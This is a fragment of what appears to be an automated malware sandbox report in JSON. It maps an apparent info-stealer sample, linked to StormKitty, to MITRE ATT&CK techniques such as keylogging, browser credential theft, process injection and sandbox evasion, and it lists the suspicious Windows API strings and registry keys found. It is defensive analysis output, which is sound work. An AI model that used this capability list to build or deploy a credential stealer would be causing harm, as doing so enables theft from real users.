"suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 4, "informative_identifiers_count": 12}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Windows Credential Manager", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Browser Information Discovery", "attck_id": "T1217", "attck_id_wiki": "https://attack.mitre.org/techniques/T1217", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 6, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-135", "type": 2, "relevance": 1, "name": "Found well known domains (string)", "description": "\"mhttps://github.com/LimerBoy/StormKitty\" (Indicator: \"github.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"set_UseShellExecute\" (Indicator: \"ShellExecute\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"CreateDirectory\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"Software\\Valve\\Steam\" in Source: 3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 600011d-ProgramMainForm~_\n \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\" in Source: 6000184-ProductKey~GetWindowsProductKeyFromRegistry\n \"Software\\\\Valve\\\\Steam\" in Source: 60001a4-Steam~GetSteamSession\n \"Software\\\\\" in Source: 600033b-cctor\n \"Win32Registry|System\\CurrentControlSet\\Services\\Class\\\" in Source: 00000000-00006044.00000001.68159.002F0000.00000004.mdmp\n 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\n \"Win32Registry|SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\" in Source: 00000000-00006044.00000001.68159.002F0000.00000004.mdmp\n 00000000-00006044.00000002.70084.002F0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"SendARP\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetProcessById\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"VaultFree\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"SendMessage\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetModuleHandle\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetTempFileName\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetKeyboardState\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"SetThreadExecutionState\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetKeyState\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetTempPath\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"RtlSetProcessIsCritical\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"VaultGetItem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptCloseAlgorithmProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptOpenAlgorithmProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"VaultEnumerateItems\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"SetProcessShutdownParameters\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"VaultCloseVault\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"VaultOpenVault\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetParent\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptDecrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptEncrypt\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetKeyboardLayout\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetWindowText\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"GetConsoleWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"ToUnicodeEx\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"SetWindowsHookEx\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"CallNextHookEx\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"CreateMutex\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"MessageBox\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"MapVirtualKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptImportKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptDestroyKey\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"CreateDirectory\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptGetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"BCryptSetProperty\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00006044.00000000.66236.0026B000.00000004.mdmp\")\n Found reference to API (Indicator: \"Local State\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendARP\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetProcessById\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultFree\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"SendMessage\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempFileName\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardState\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadExecutionState\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlSetProcessIsCritical\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultGetItem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptCloseAlgorithmProvider\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptOpenAlgorithmProvider\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultEnumerateItems\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetProcessShutdownParameters\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultCloseVault\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"VaultOpenVault\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"CheckRemoteDebuggerPresent\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptEncrypt\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetWindowText\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetConsoleWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"ToUnicodeEx\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnhookWindowsHookEx\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetWindowsHookEx\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"CallNextHookEx\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateMutex\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapVirtualKey\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API (Indicator: \"BCryptImportKey\"; Source: 